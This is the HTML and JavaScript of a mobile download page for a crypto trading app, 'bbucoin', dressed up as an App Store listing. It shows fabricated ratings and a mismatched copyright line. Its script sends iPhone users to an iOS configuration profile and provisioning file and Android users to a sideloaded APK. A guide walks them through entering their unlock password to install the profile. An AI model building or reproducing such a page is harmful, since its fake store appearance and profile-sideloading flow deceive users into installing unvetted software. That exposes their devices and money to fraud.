<!doctype html>
<html>
<head design-width="750">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="format-detection" content="telephone=no">
<title>bbucoin</title>
<link rel="stylesheet" href="css/reset.css"><!--重置样式-->
<link rel="stylesheet" href="css/style.css"><!--页面样式-->
<link rel="stylesheet" href="css/swiper.min.css">
<link rel="stylesheet" type="text/css" href="static/css/index.css">
<script src="js/auto-size.js"></script><!--设置字体大小-->
<script src="js/jquery.datetimepicker.fulls.js"></script>
</head>
<body ontouchstart="" onmouseover="">
	<div class="mobile-wrap center">
        <main>
        	<div class="appItem">
        		<div class="left"><img src="img/logo.png" alt=""></div>
        		<div class="right">
        			<strong>bbucoin<span>3+</span></strong>
        			<p>bbucoin</p>
        			<div class="installBox">
        				<a class="down" href="javascript:;">Free installation</a>
        				<a class="doubt" href="javascript:;">?</a>
        			</div>
        		</div>
        		<div class="appTip">
        			<div class="score">
        			<div class="star">4.9 ★★★★★<var></var></div>
        				<p>19k scores</p>
        			</div>
        			<div class="centerBox"> <i>#</i>3 </div>
        			<div class="age">
        				<b>4+</b>
        				<p>Age</p>
        			</div>
        		</div>
				    <div class="app-intro">
        <div class="app-intro-con" style="height: auto;">
            <p style="padding: 8px 8px 8px 8px; color: white; background-color: #e64141; border-radius: 5px;">
                1、After downloading Android phone, click Install<br>
                2、Click Finish to jump to settings for installation.
            </p>
        </div>
    </div>
        	</div>
        	<div class="comment">
        		<strong class="publicTitle">Ratings and comments</strong>
        		<div class="left">
        		    <b>5.0</b>
        			<p>The full score is 5</p>
        		</div>
        		<div class="right">
        			<div class="star_row">
        				<span class="s1"><i></i></span>
        				<div class="lineBox"><var class="v1"></var></div>
        			</div>
        			<div class="star_row">
        				<span class="s2"><i></i></span>
        				<div class="lineBox"><var class="v2"></var></div>
        			</div>
        			<div class="star_row">
        				<span class="s3"><i></i></span>
        				<div class="lineBox"><var class="v3"></var></div>
        			</div>
        			<div class="star_row">
        				<span class="s4"><i></i></span>
        				<div class="lineBox"><var class="v4"></var></div>
        			</div>
        			<div class="star_row">
        				<span class="s5"><i></i></span>
        				<div class="lineBox"><var class="v5"></var></div>
        			</div>
        			<p>19k scores</p>
        		</div>
        	</div>
        	<div class="newFunction">
        		<strong class="publicTitle">New function</strong>
        		<p>Currency change,lever trade,second trade</p>
        	</div>
        	<div class="appInfo">
        		<strong class="publicTitle">Informations</strong>
        		<div class="box">
        			<ul>
        				<li>
        					<span>Size</span>
        					<p>24.5 MB</p>
        				</li>
        				<li>
        					<span>Compatibility</span>
        					<p>Requires IOS 8.0 or higher. Compatible with iPhone, iPad and iPod touch.</p>
        				</li>
        				<li>
        					<span>Language</span>
        					<p>English,Chinese,Japanese,Korean</p>
        				</li>
        				<li>
        					<span>Age classification</span>
        					<p>Over 4 years old</p>
        				</li>
        				<li>
        					<span>Copyright</span>
        					<p>© 2018 MobiFun Games Inc</p>
        				</li>
        				<li>
        					<span>Price</span>
        					<p>Free</p>
        				</li>
        				<li>
        					<span>Privacy policy</span>
        					<p>✋</p>
        				</li>
        			</ul>
        		</div>
        	</div>
        </main>
		<div class="footer">
			<p>Disclaimers：</p>
			<p class="p2">This website only provides app download and installation hosting for developers. App developers are responsible for the content and operation related matters within the app, which has nothing to do with this website</p>
		</div>
		<div class="pup">
			<div class="guide">
				<i class="colse"></i>
				<div class="pics">
					<div class="swiper-container">
					    <div class="swiper-wrapper">
						     <div class="swiper-slide">
						     	<div class="pic"><img src="img/0df0c_0_600_411.jpg" alt=""></div>
						     	<div class="text">Guide<br>Step 1:  allows you to open the configuration description file</div>
						     </div>
						     <div class="swiper-slide">
						     	<div class="pic"><img src="img/9179e_3_600_411.jpg" alt=""></div>
						     	<div class="text">Guide<br>Step 2: click the Install button in the upper right corner</div>
						     </div>
						     <div class="swiper-slide">
						     	<div class="pic"><img src="http://122.51.151.220/img/d3c74_2_600_411.jpg" alt=""></div>
						     	<div class="text">Guide<br>Step 3:  to input the power on unlock password </div>
						     </div>
						     <div class="swiper-slide">
						     	<div class="pic"><img src="img/0665a_1_600_411.jpg" alt=""></div>
						     	<div class="text">Guide<br>Step 4: click the Install button below</div>
						     </div>
					    </div>
					    <div class="swiper-pagination"></div>
					</div>
				</div>
				<div class="smallTip"><a href="">What is a description file?</a></div>
			</div>
		</div>
	
	<div class="pupPic"><img src="img/5cbc4_5_1242_2007.png" alt=""></div>
    </div><!--mobile_wrap-->

	<script src="js/jquery-2.2.4.min.js"></script><!--jQ库-->
	<script src="js/swiper-4.2.0.min.js"></script><!--轮播库-->
	<script>
        $("body").css("cursor","pointer");
        
        var ua = navigator.userAgent.toLowerCase();
        var Sys = {};
        var s;
        (s = ua.match(/version\/([\d.]+).*safari/)) ? Sys.safari = s[1] : 0;


        //判断设备是否为iPhone
        if (/(iPhone|iPad|iPod|iOS)/i.test(ua)) {  
            if (Sys.safari) {
                $(".down").attr("href",'./sign.mobileconfig');
                $(".down").click(function(event) {
                    setTimeout(function(){
                        if(confirm){
                            location.href = "./app.mobileprovision";
                        }
                    },4500)
                });
                //打开引导弹窗
                $(".doubt").click(function(event) {
                    $(".pup").fadeIn();
                    var swiper = new Swiper('.swiper-container',{
                        loop: true,
                        pagination: {
                            el: '.swiper-pagination',
                        },
                    });
                });
            }else{
                $("body").click(function(event) {
                    $(".pupPic").show();
                 });
            }
        } 
        //判断是否QQ内置浏览器
        else if(ua.indexOf(' qq')>-1 && ua.indexOf('mqqbrowser') <0){
            $(".down").attr("href",'###');
            $("body").click(function(event) {
                $(".pupPic").show();
             });
        }
        //判断Android
        else if (/(Android)/i.test(ua)) {   
            $(".down").attr("href",'./Android.apk');
            //打开引导弹窗
            $(".doubt").click(function(event) {
                $(".pup").fadeIn();
                var swiper = new Swiper('.swiper-container',{
                    loop: true,
                    pagination: {
                        el: '.swiper-pagination',
                    },
                });
            });
        }
        //在微信中打开
        if (ua.match(/MicroMessenger/i) == "micromessenger") {
            $(".down").attr("href",'###');
            $("body").click(function(event) {
                $(".pupPic").show();
             });
        }
        
		//关闭弹窗
		$(".colse").click(function(event) {
			$(".pup").fadeOut();
		});

        
	</script>
</body>
</html>
